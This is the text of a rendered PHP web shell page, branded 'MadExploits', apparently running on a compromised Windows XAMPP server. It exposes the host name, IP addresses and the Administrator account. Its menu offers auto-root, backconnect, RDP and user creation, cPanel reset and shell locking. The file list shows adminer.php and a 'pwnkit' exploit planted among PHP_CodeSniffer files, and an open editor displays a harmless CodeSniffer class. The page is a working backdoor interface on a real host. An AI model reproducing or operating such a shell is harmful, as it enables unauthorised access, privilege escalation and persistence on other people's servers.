Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 216.73.216.124
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
xampp /
php /
pear /
PHP /
CodeSniffer /
Standards /
[ HOME SHELL ]
Name
Size
Permission
Action
Generic
[ DIR ]
drwxrwxrwx
MySource
[ DIR ]
drwxrwxrwx
PEAR
[ DIR ]
drwxrwxrwx
PHPCS
[ DIR ]
drwxrwxrwx
Squiz
[ DIR ]
drwxrwxrwx
Zend
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-rw-rw-
AbstractPatternSniff.php
33.57
KB
-rw-rw-rw-
AbstractScopeSniff.php
7.65
KB
-rw-rw-rw-
AbstractVariableSniff.php
7.79
KB
-rw-rw-rw-
IncorrectPatternException.php
1.06
KB
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : IncorrectPatternException.php
<?php /** * An exception thrown if the pattern being processed is not supposed to be * validating the code in question. * * PHP version 5 * * @category PHP * @package PHP_CodeSniffer * @author Greg Sherwood <gsherwood@squiz.net> * @author Marc McIntyre <mmcintyre@squiz.net> * @copyright 2006-2011 Squiz Pty Ltd (ABN 77 084 670 600) * @license http://matrix.squiz.net/developer/tools/php_cs/licence BSD Licence * @link http://pear.php.net/package/PHP_CodeSniffer */ /** * An exception thrown if the pattern being processed is not supposed to be * validating the code in question. * * @category PHP * @package PHP_CodeSniffer * @author Greg Sherwood <gsherwood@squiz.net> * @author Marc McIntyre <mmcintyre@squiz.net> * @copyright 2006-2011 Squiz Pty Ltd (ABN 77 084 670 600) * @license http://matrix.squiz.net/developer/tools/php_cs/licence BSD Licence * @version Release: 1.3.3 * @link http://pear.php.net/package/PHP_CodeSniffer */ class PHP_CodeSniffer_Standards_IncorrectPatternException extends Exception { }//end class ?>
Close